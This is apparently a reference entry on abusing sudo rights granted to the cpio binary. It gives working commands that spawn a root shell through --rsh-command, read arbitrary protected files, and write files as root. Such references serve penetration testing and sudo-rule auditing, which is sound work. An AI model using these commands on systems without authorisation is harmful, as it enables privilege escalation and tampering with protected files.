***** Sudo *****
If the binary is allowed to run as superuser by sudo, it does not drop the
elevated privileges and may be used to access the file system, escalate or
maintain privileged access.
    * echo '/bin/sh </dev/tty >/dev/tty' >localhost
      sudo cpio -o --rsh-command /bin/sh -F localhost:
    * The whole directory structure is copied to $TF.
      LFILE=file_to_read
      TF=$(mktemp -d)
      echo "$LFILE" | sudo cpio -R $UID -dp $TF
      cat "$TF/$LFILE"
    * Copies $LFILE to the $LDIR directory.
      LFILE=file_to_write
      LDIR=where_to_write
      echo DATA >$LFILE
      echo $LFILE | sudo cpio -R 0:0 -p $LDIR
